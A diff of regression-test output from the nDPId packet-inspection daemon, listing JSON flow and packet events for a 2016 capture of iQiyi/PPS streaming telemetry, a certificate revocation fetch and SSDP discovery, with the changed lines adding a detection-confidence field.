 01304{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1122,"source":"pps.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1467353167288,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":694,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":694,"pkt_l4_len":660,"ts_msec":1467353167288,"pkt":"TF4M6gNlABxCjnAxCABFAAKoG9BAAIAGqFHAqHMIJG7cD8VCAFB9qW\/gOgaPJFAY\/\/DRFwAAR0VUIC90bXBzdGF0cy5naWY\/dHlwZT1yZWNjdHBsYXkyMDEyMTIyNiZ1c3JhY3Q9c2hvdyZwcHVpZD0tMSZ1aWQ9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mZXZlbnRfaWQ9NGIwODY4OTIwYjBmODI4NTMyMGE5ZTAwZWUwMzY5ZTUmY2lkPTMxJmJrdD1wcHNfY196ZWJyYV9tYWluX2RlZmF1bHQmYXJlYT1wcHNfY196ZWJyYSZwbGF0Zm9ybT0yMDEyJmFsYnVtbGlzdD00NzA2OTQ1MDAsNDcxNTkxMzAwLDQ2NTY0MTAwMCw0NzI4ODcxMDAsNDcxNzg4MTAwLDQ3Mzc0NjMwMCw0NzE5NDgzMDAsNDczNjk0NjAwLDQ3MjE4OTUwMCZhaWQ9NDc5NTMxMDAwJnNvdXJjZT0wLDEsMSwxLDEsMSwxLDEsMSZfPTE0NjczNTMxNjcwODcgSFRUUC8xLjENCkFjY2VwdDogKi8qDQpSZWZlcmVyOiBodHRwOi8vdm9kZ3VpZGUucHBzLmlxaXlpLmNvbS9wYWdlLnBocD92ZXJzaW9uPTUuMi4xNS4yMjQwDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLVRXDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChjb21wYXRpYmxlOyBNU0lFIDkuMDsgV2luZG93cyBOVCA2LjE7IFRyaWRlbnQvNS4wKQ0KSG9zdDogbXNnLnZpZGVvLnFpeWkuY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-01147{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1122,"source":"pps.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353167288,"flow_last_seen":1467353167288,"flow_idle_time":7440000,"flow_min_l4_payload_len":640,"flow_max_l4_payload_len":640,"flow_tot_l4_payload_len":640,"flow_avg_l4_payload_len":640,"midstream":1,"ts_msec":1467353167288,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.110.220.15","src_port":50498,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.video.qiyi.com","url":"msg.video.qiyi.com\/tmpstats.gif?type=recctplay20121226&usract=show&ppuid=-1&uid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&event_id=4b0868920b0f8285320a9e00ee0369e5&cid=31&bkt=pps_c_zebra_main_default&area=pps_c_zebra&platform=2012&albumlist=470694500,471591300,465641000,472887100,471788100,473746300,471948300,473694600,472189500&aid=479531000&source=0,1,1,1,1,1,1,1,1&_=1467353167087","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident\/5.0)"}}
+01173{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1122,"source":"pps.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353167288,"flow_last_seen":1467353167288,"flow_idle_time":7440000,"flow_min_l4_payload_len":640,"flow_max_l4_payload_len":640,"flow_tot_l4_payload_len":640,"flow_avg_l4_payload_len":640,"midstream":1,"ts_msec":1467353167288,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.110.220.15","src_port":50498,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.video.qiyi.com","url":"msg.video.qiyi.com\/tmpstats.gif?type=recctplay20121226&usract=show&ppuid=-1&uid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&event_id=4b0868920b0f8285320a9e00ee0369e5&cid=31&bkt=pps_c_zebra_main_default&area=pps_c_zebra&platform=2012&albumlist=470694500,471591300,465641000,472887100,471788100,473746300,471948300,473694600,472189500&aid=479531000&source=0,1,1,1,1,1,1,1,1&_=1467353167087","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident\/5.0)"}}
 00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1123,"source":"pps.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":2,"flow_last_seen":1467353167373,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"ts_msec":1467353167373,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5WoJAAC4GvY4kbtwPwKhzCABQxUI6Bo8kfalyYFAYPAD9ZAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjA2IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1125,"source":"pps.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353170523,"flow_last_seen":1467353170523,"flow_idle_time":7440000,"flow_min_l4_payload_len":1043,"flow_max_l4_payload_len":1043,"flow_tot_l4_payload_len":1043,"flow_avg_l4_payload_len":1043,"midstream":1,"ts_msec":1467353170523,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.76","src_port":50499,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 01839{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1125,"source":"pps.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1467353170523,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1097,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1097,"pkt_l4_len":1063,"ts_msec":1467353170523,"pkt":"TF4M6gNlABxCjnAxCABFAAQ7HjFAAIAGHsHAqHMIb84WTMVDAFDdQoxSQH15t1AYQTfZKwAAR0VUIC9iP3Q9NSZwZj0yMDEmcD0xMSZwMT0xMTQmcm49MTQ2NzM1MzE2NzIyMSZhPTM0JmNsdD10dmcyMDE1X2JhaWtlQl9jb21tZW50X3Nob3cmdHlwZT1wYyZyZWY9bm9yZWYmdXJsPWh0dHAlM0EvL3ZvZGd1aWRlLnBwcy5pcWl5aS5jb20vcGFnZS5waHAlM0Z2ZXJzaW9uJTNENS4yLjE1LjIyNDAlMjNjbGFzcyUzRDIwMDAwMzcxOSUyNTI0JTI1MjQlMjUyNCUyNTI0MTgwOTMyMzAxJTI2ZW50aXR5aWQlM0Q0Nzk1MzEwMDAlMjZiYWlrZWlkJTNEMjAzMjI5NDkwJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4gSFRUUC8xLjENCkFjY2VwdDogKi8qDQpSZWZlcmVyOiBodHRwOi8vdm9kZ3VpZGUucHBzLmlxaXlpLmNvbS9wYWdlLnBocD92ZXJzaW9uPTUuMi4xNS4yMjQwDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLVRXDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChjb21wYXRpYmxlOyBNU0lFIDkuMDsgV2luZG93cyBOVCA2LjE7IFRyaWRlbnQvNS4wKQ0KSG9zdDogbXNnLmlxaXlpLmNvbQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQ29va2llOiBwcHNfY2xpZW50X3ZlcjI9NS4yLjE1LjIyNDA7IFQwMDQwND00ZTNhZTQxNWE1ODQ3NDhhYzlhYTMxNjI4ZjM5ZDFlODsgX3Bwc19pdmk9Vms0OU1UWXdOVEExTGFXL3BQbWhSejgvUDZUYXBFZW11RDgvcE0rd1pqOHRwTFd4M3pnd3Bsby9wR2FvY1NaV1VEMHhKbFpEUFQ4L1B6OCtwTFd4M3pnd3Bsby9wR2FvY1NaV1NqMHRNU1pXVXoxV0psWkVQU1pXVkZ0QlhUMHlNVGMxSmxaTlBTWldWajAxTGpJdU1UVXVNakkwTUNaV1ZUMW9kSFJ3T2k4dmQzZDNMbWx4YVhscExtTnZiUzkyWHpFNWNuSnNkblY0YkdjdWFIUnRiQT09OyBRQzAwNj11NTQ5dnB6MTBsOWZrYXR1bTRhbHc0YnA7IFFDMDA4PTE0NjY2NDU4MTYuMTQ2NjY0NTgxNi4xNDY2NjQ1ODE2LjE7IEhtX2x2dF81M2I3Mzc0YTYzYzM3NDgzZTVkZDk3ZDc4ZDliYjM2ZT0xNDY2NjQ1ODE3OyBRQzAwNT1hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbg0KDQo="}
-01081{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1125,"source":"pps.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353170523,"flow_last_seen":1467353170523,"flow_idle_time":7440000,"flow_min_l4_payload_len":1043,"flow_max_l4_payload_len":1043,"flow_tot_l4_payload_len":1043,"flow_avg_l4_payload_len":1043,"midstream":1,"ts_msec":1467353170523,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.76","src_port":50499,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?t=5&pf=201&p=11&p1=114&rn=1467353167221&a=34&clt=tvg2015_baikeB_comment_show&type=pc&ref=noref&url=http%3A\/\/vodguide.pps.iqiyi.com\/page.php%3Fversion%3D5.2.15.2240%23class%3D200003719%2524%2524%2524%2524180932301%26entityid%3D479531000%26baikeid%3D203229490&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident\/5.0)"}}
+01107{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1125,"source":"pps.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353170523,"flow_last_seen":1467353170523,"flow_idle_time":7440000,"flow_min_l4_payload_len":1043,"flow_max_l4_payload_len":1043,"flow_tot_l4_payload_len":1043,"flow_avg_l4_payload_len":1043,"midstream":1,"ts_msec":1467353170523,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.76","src_port":50499,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?t=5&pf=201&p=11&p1=114&rn=1467353167221&a=34&clt=tvg2015_baikeB_comment_show&type=pc&ref=noref&url=http%3A\/\/vodguide.pps.iqiyi.com\/page.php%3Fversion%3D5.2.15.2240%23class%3D200003719%2524%2524%2524%2524180932301%26entityid%3D479531000%26baikeid%3D203229490&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident\/5.0)"}}
 00641{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1126,"source":"pps.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":2,"flow_last_seen":1467353171307,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"ts_msec":1467353171307,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5FgtAADMGd2lvzhZMwKhzCABQxUNAfXm33UKQZVAYACEI\/gAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjEwIEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1127,"source":"pps.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353172446,"flow_last_seen":1467353172446,"flow_idle_time":7440000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":235,"midstream":1,"ts_msec":1467353172446,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"23.41.133.163","src_port":50500,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00760{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1127,"source":"pps.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1467353172446,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":289,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":289,"pkt_l4_len":255,"ts_msec":1467353172446,"pkt":"TF4M6gNlABxCjnAxCABFAAETH7ZAAIAGCbLAqHMIFymFo8VEAFBenvyU0fNBYlAYAQQxqAAAR0VUIC9wY2EzLWc1LmNybCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQWNjZXB0OiAqLyoNCklmLU1vZGlmaWVkLVNpbmNlOiBUaHUsIDI0IE1hciAyMDE2IDE3OjQwOjA1IEdNVA0KSWYtTm9uZS1NYXRjaDogIjE3MjE5NjllNzMyYmNmZGRhNGQ4NWMxNjM5MGViYTcwOjE0NTg4NDI1OTciDQpVc2VyLUFnZW50OiBNaWNyb3NvZnQtQ3J5cHRvQVBJLzYuMQ0KSG9zdDogczEuc3ltY2IuY29tDQoNCg=="}
-00742{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1127,"source":"pps.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353172446,"flow_last_seen":1467353172446,"flow_idle_time":7440000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":235,"midstream":1,"ts_msec":1467353172446,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"23.41.133.163","src_port":50500,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"s1.symcb.com","url":"s1.symcb.com\/pca3-g5.crl","code":0,"content_type":"","user_agent":"Microsoft-CryptoAPI\/6.1"}}
+00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1127,"source":"pps.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353172446,"flow_last_seen":1467353172446,"flow_idle_time":7440000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":235,"midstream":1,"ts_msec":1467353172446,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"23.41.133.163","src_port":50500,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"s1.symcb.com","url":"s1.symcb.com\/pca3-g5.crl","code":0,"content_type":"","user_agent":"Microsoft-CryptoAPI\/6.1"}}
 01499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1128,"source":"pps.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1467353172450,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":839,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":839,"pkt_l4_len":805,"ts_msec":1467353172450,"pkt":"ABxCjnAxTF4M6gNlCABFAAM59KBAADkGeaEXKYWjwKhzCABQxUTR80FiXp79f1AYA7JdXgAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IEFwYWNoZQ0KRVRhZzogIjM2ZGFiMGNkZDA1ODVlZmNmMjhlYjY3NzRhZWVlOTJhOjE0NjY3OTc4MTQiDQpMYXN0LU1vZGlmaWVkOiBGcmksIDI0IEp1biAyMDE2IDE5OjUwOjE0IEdNVA0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjoxMSBHTVQNCkNvbnRlbnQtTGVuZ3RoOiA1MzMNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vcGtpeC1jcmwNCg0KMIICETCB+jANBgkqhkiG9w0BAQUFADCByjELMAkGA1UEBhMCVVMxFzAVBgNVBAoTDlZlcmlTaWduLCBJbmMuMR8wHQYDVQQLExZWZXJpU2lnbiBUcnVzdCBOZXR3b3JrMTowOAYDVQQLEzEoYykgMjAwNiBWZXJpU2lnbiwgSW5jLiAtIEZvciBhdXRob3JpemVkIHVzZSBvbmx5MUUwQwYDVQQDEzxWZXJpU2lnbiBDbGFzcyAzIFB1YmxpYyBQcmltYXJ5IENlcnRpZmljYXRpb24gQXV0aG9yaXR5IC0gRzUXDTE2MDYyMzAwMDAwMFoXDTE2MDkzMDIzNTk1OVowDQYJKoZIhvcNAQEFBQADggEBAEI97eVcH1DiB1\/0Bno6J+K8HusVe3cUvr5+fyScH1zXRcf7c5djWYgN+SuML4v70NdV\/FuJwb2d1nTAPxF1qboQaHggi98zdzXj8RwrHgS5mm8yRgjh5Xn7nIaC171csZuQguJ7tmZuJ7r76UMkne0JyJ14wsSf90xX+g\/a\/dFyP90Y6ni5xSPgpc8d3Zgw\/EfU0UQm\/T+f09jhD1\/1X6BOBM7pQUZMpb0wu+RThkQxkoU7zdqSaSWoF1RKiDChBGCnoysqx+p1d9U16eVsZvZ0VQEVpSaXicfzrXu+tMxjeZnFuPSglD2NZ6ZxRQtvm2pR35dtCeWkmxI8I6zBG3M="}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1129,"source":"pps.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353172912,"flow_last_seen":1467353172912,"flow_idle_time":7440000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"ts_msec":1467353172912,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50501,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 01637{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1129,"source":"pps.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1467353172912,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":946,"pkt_l4_len":912,"ts_msec":1467353172912,"pkt":"TF4M6gNlABxCjnAxCABFAAOkIBFAAIAGyjnAqHMIymwO7MVFAFDpA4X9\/kkVyVAYQTfM+gAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6NDU6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTIzNDQ3JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1NDkzNCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxNzIwNTEmc2g9JnNxPSZzdz0mdD0xcSZ1PTBfYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdj00Nzk1MzEwMDAmdnY9NS4yLjE1LjIyNDAmeD0meT1xY18xMDAwMDFfMTAwMTQwIEhUVFAvMS4xDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLUNODQpSZWZlcmVyOiBodHRwOi8vd3d3LmlxaXlpLmNvbS9jb21tb24vZmxhc2hwbGF5ZXIvMjAxNDA5MjQvTWFpblBsYXllcl81XzJfM19jM18yXzFfNi5zd2YNCnF5aWQ6IGFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDogXzIwMTINCnF5cGxhdGZvcm06IDAtMg0KeC1mbGFzaC12ZXJzaW9uOiAxMiwwLDAsNzANCkFjY2VwdDogKi8qDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgOC4wOyBXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMCkvUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQoNCg=="}
-01263{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1129,"source":"pps.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353172912,"flow_last_seen":1467353172912,"flow_idle_time":7440000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"ts_msec":1467353172912,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50501,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:45:23|45&av=4.10.004&b=180932301&c=31&ct=5000000923447&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000854934&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353172051&sh=&sq=&sw=&t=1q&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}}
+01289{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1129,"source":"pps.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353172912,"flow_last_seen":1467353172912,"flow_idle_time":7440000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"ts_msec":1467353172912,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50501,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:45:23|45&av=4.10.004&b=180932301&c=31&ct=5000000923447&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000854934&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353172051&sh=&sq=&sw=&t=1q&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}}
 00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1130,"source":"pps.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":2,"flow_last_seen":1467353173018,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"ts_msec":1467353173018,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5BZNAADMGNKPKbA7swKhzCABQxUX+SRXJ6QOJeVAYACCXCgAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjEyIEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1131,"source":"pps.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353179045,"flow_last_seen":1467353179045,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1467353179045,"l3_proto":"ip4","src_ip":"192.168.5.38","dst_ip":"239.255.255.250","src_port":58897,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1131,"source":"pps.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1467353179045,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"ts_msec":1467353179045,"pkt":"AQBef\/\/6cBiLE+IdCABFAAChI6EAAAER3+LAqAUm7\/\/\/+uYRB2wAjbWjTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="}
-00610{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1131,"source":"pps.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353179045,"flow_last_seen":1467353179045,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1467353179045,"l3_proto":"ip4","src_ip":"192.168.5.38","dst_ip":"239.255.255.250","src_port":58897,"dst_port":1900,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1131,"source":"pps.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353179045,"flow_last_seen":1467353179045,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1467353179045,"l3_proto":"ip4","src_ip":"192.168.5.38","dst_ip":"239.255.255.250","src_port":58897,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
